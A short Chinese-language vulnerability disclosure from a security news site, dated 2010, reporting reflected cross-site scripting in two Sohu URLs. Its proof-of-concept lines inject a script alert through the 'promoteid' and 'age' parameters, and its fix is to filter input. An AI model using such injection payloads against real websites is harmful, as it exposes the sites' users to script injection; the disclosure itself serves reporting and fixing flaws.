频道栏目
首页 > 安全 > 网站安全 > 正文

搜狐爱家团的XSS及修复

2010-12-21 11:34:11      个评论      
收藏   我要投稿
简要描述:鸡肋~~
详细说明:攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的
漏洞证明:http://tuan.sohu.com/beijing/home/?promoteid="><script>alert("xss");</script><"
http://so.tv.sohu.com/mts?chl=&c=2&whole=1&o=1&cat=&area=&year=-1&cs=&age=%22%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E%3C%22&wd=
修复方案:过滤不严导致的,对相关代码进行过滤即可
相关TAG标签 爱家 搜狐
上一篇:PHP Web Scripts Ad Manager Pro v3 SQL In
下一篇:YY数据库空密码(已修复)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站